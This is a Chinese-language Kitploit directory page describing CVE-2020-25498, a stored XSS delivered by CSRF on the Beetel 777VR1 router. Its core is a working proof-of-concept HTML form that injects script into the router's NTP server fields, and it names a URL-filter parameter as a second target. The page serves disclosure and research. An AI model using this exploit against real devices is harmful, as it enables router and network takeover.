Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2020-25498 — Beetel 777VR1 路由器中通过 CSRF 实现的存储型 XSS | Kitploit
工具/GitHubGitHub/the-girl-who-lived/cve-2020-25498
钓鱼工具漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubthe-girl-who-lived/cve-2020-25498

CVE-2020-25498

Beetel 777VR1 路由器中通过 CSRF 实现的存储型 XSS

查看仓库
35年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2020-25498: Beetel 777VR1 路由器中的存储型 XSS(通过 CSRF)

漏洞描述

已确认,易受攻击的端点没有服务器端输入验证,也缺乏针对任何恶意脚本注入的客户端过滤。攻击者可以利用此漏洞在端点中注入恶意脚本,并且在用户每次打开该易受攻击的端点时,脚本都会被激活。攻击者可以发送带有 POST 请求负载的恶意 URL,通过 CSRF 在管理员模块中执行 XSS,从而接管设备,并最终接管整个网络。

研究人员: Sayli Ambure (https://twitter.com/sayli_ambure)

MITRE CVE 链接: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25498

概念验证漏洞利用:

CSRF HTML 代码:

root@kitploit:~
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.1.1/form2ntp.cgi" method="POST">
      <input type="hidden" name="ntpstate" value="Enable" />
      <input type="hidden" name="ntpserver" value='google&#46;com"><script>alert(1)</script>' />
      <input type="hidden" name="ntpserver2" value='google&#46;com"><script>alert(2)</script>' />
      <input type="hidden" name="ntpinterval" value="1" />
      <input type="hidden" name="ntptimezone" value="330" />
      <input type="hidden" name="submit&#46;htm&#63;time&#46;htm" value="Send" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

1. 系统时间配置模块中的 NTP 服务器名称

参数:服务器名称

概念验证视频:

2. 防火墙模块中的 URL 过滤端点

参数:关键字

概念验证视频:

下载工具